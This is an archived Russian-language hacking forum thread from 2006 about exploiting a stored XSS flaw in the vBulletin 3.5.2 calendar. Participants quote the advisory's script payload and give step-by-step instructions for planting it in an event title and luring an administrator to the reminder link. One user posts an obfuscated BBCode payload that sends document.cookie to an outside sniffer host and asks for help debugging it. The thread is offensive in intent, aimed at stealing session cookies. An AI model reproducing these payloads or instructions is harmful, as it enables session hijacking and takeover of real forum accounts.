ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
Перезагрузить страницу Как использовать эту уязвимость в vBulletin 3.5.2?
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Как использовать эту уязвимость в vBulletin 3.5.2?
  #1  
Старый 19.01.2006, 16:15
ProblemaT
Познающий
Регистрация: 16.12.2005
Сообщений: 42
Провел на форуме:
173841

Репутация: -4
По умолчанию Как использовать эту уязвимость в vBulletin 3.5.2?
Если не трудно объясните куда её внедрить... эту xss, в клендарь... но куда именно

Vulnerability:
--------------------
Html_Injection :
The software does not properly filter HTML tags in the title of events before being passed to user in 'calendar.php'&'reminder.php AS include'. that may allow a remote user to inject HTML/javascript codes to events of calendar. The hostile code may be rendered in the web browser of the victim user who will Request Reminder for those Events (persistent).
For example an attacker creates new event (Single-All Day Event , Ranged Event OR Recurring Event)with this content:

TITLE:--------->Test<script>alert(document.cookie)</script>
BODY:---------->No matter
OTHER OPTIONS:->No matter

The hostile code will be rendered in the web browser of the victim user who will Request Reminder for this Event via http://example.com/vbulletin/calenda...addreminder&e=[eventid]
The hostile code will originate from the site running the Vbulletin software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies),or take actions on the site acting as the target user.

http://www.securitylab.ru/vulnerabil...rce/243694.php

Читаю читаю не могу понять(с английским у меня трудновато)...
 

Весьма просто!
  #2  
Старый 20.01.2006, 00:43
F_taker
Новичок
Регистрация: 18.01.2006
Сообщений: 23
Провел на форуме:
49223

Репутация: 1
По умолчанию Весьма просто!
Кстати первая уязвимость, которую я использовал)
Знач суть такова, что в заголовке не фильтруется текст на javascript.
Создаешь в календаре событие(желательно на сл.год ) с заголовком, содержащем XSS.
Создал? смотри ссылку в браузере - там после &е= будет число.
Далее подставляешь - http://example.com/vbulletin/calenda...addreminder&e=[тут число]
впариваешь эту ссылку админу и будет тебе счастье.
 

  #3  
Старый 20.01.2006, 01:44
milord69
Новичок
Регистрация: 24.11.2005
Сообщений: 18
Провел на форуме:
55564

Репутация: 0
По умолчанию
Эта уязвимость работает на 3.5.0 версии?
 

  #4  
Старый 21.01.2006, 14:07
F_taker
Новичок
Регистрация: 18.01.2006
Сообщений: 23
Провел на форуме:
49223

Репутация: 1
По умолчанию
должна работать. В исходнике написано что и ранние версии тоже могут быть уязвимы.
 

  #5  
Старый 22.01.2006, 16:24
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
Question
Ребята вы мне подскажите что я тут не так сделал?



Код HTML:
[EMAIL=[URL=s as=`s@wew.ew]mailto:assss@wew.ew ]
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip	t:document.Images[1].src="htt"+"p"+":"+"/"+"/"+"antichat.org/s/Electro.gif?"+document.cookie)`
Алерт есть, и этот сплойт не палится но на сниффе ничего
Последний раз редактировалось Electro; 22.01.2006 в 16:28.. Причина: забыл про тег
 

  #6  
Старый 22.01.2006, 16:43
Barsik
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
Провел на форуме:
3463790

Репутация: 726
Отправить сообщение для Barsik с помощью ICQ Отправить сообщение для Barsik с помощью MSN
По умолчанию
Ты через Оперу может сидишь? Если да то попробуй через Ie
 

  #7  
Старый 22.01.2006, 16:55
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию
Цитата:
Сообщение от Barsik  
Ты через Оперу может сидишь? Если да то попробуй через Ie
Неа я под ИЕ
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ